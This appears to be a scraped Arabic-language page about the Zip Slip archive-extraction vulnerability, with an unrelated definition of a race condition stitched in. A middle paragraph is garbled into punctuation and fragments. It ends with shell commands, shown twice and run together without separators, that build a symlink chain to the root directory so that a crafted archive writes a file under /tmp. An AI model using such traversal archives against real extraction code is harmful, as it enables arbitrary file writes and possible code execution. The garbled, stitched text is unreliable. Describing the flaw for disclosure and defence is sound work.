Zip Slip هو ثغرة أمنية شديدة الانتشار في فك ضغط الأرشيف تسمح للمهاجمين بكتابة ملفات عشوائية إلى النظام ، مما يؤدي عادةً إلى تنفيذ الأوامر عن بُعد. تم اكتشافه والكشف عنه من قبل فريق Snyk Security تحسبًا لكشف عام في 5 يونيو 2018 وأثر على آلاف المشاريع ، بما في ذلك HP و Amazon و Apache و Pivotal وغيرها الكثير.
شرط السباق (ملاحظة ، حالة السباق) ، والمنافسة أيضًا خطأ في تصميم نظام أو تطبيق متعدد الخيوط يعتمد فيه تشغيل النظام أو التطبيق على الترتيب الذي يتم فيه تنفيذ أجزاء من الكود.
, « » .zip-, yauzl , «..»., , . . , , ., , . / , . . - :mkdir generic_dirln -s ../ generic_dir/symlink_to_parent_dirln -s / symlink_to_roottouch generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/symlink_to_root/tmp/slipped_zip.txt!
mkdir generic_dirln -s ../ generic_dir/symlink_to_parent_dirln -s / symlink_to_roottouch generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/symlink_to_root/tmp/slipped_zip.txt